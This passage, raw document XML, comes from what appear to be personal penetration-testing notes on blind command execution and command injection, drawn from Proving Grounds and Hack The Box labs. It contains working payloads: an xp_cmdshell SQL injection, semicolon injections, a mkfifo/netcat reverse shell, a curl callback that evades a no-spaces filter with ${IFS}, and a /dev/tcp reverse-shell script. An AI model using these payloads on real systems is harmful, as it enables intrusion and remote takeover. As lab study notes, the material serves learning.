          <w:numId w:val="394"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only accept icmp (ping) packets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On victim:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -n 3 192.168.45.232</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n 3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">means ping 3 times</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or if you have SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC xp_cmdshell 'ping -n 3 192.168.45.232';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way of doing this is as below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i tun0 src 192.168.209.52</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same as above but with a filter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">src 192.168.209.52 → only capture packets where the source IP is 192.168.209.52 (target machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This can capture any protocol, not just ICMP, unless you add icmp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 4 192.168.49.209</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D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66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z6fjrw8402iy" w:id="117"/>
      <w:bookmarkEnd w:id="117"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injections</w:t>
      </w:r>
    </w:p>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hyperlink r:id="rId286">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a list of techniques to try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId287">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sii98c6883yp" w:id="118"/>
      <w:bookmarkEnd w:id="118"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the ; (semicolon) for command injection</w:t>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t xml:space="preserve">The most simple command injection is something like: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then if it's like a CTF, you can try the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it's a HTB, you can do a payload for a reverse shell (look below)</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is one example of Command Injection (found from </w:t>
      </w:r>
      <w:hyperlink r:id="rId288">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shakabrah</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw the URL had an argument </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10/?host=127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which was used to specify the target to ping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then we just tried command injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10/?host=127.0.0.1;id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked (the website displayed the ping as well as the id)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then executed a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc 192.168.45.162 80 &gt;/tmp/f.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CozyHosting HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we learned how to do command injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It asked for a username, so gave it a username but then injected another command. For example, we want the username "test", so we did:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D7E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D7F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 7000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D80">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test;curl${IFS}http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.16.4:7000;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And here, the input field didn't allow spaces so we used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">${IFS}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked, we got a response on the python listener. So then, we can try getting a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D85">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -e '#!/bin/bash\nsh -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;IP&gt;/&lt;PORT&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0&gt;&amp;1' &gt; rev.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="954"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option in the echo command in Linux enables the interpretation of backslash escape sequences within the string being echoed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="954"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash </w:t>
      </w:r>
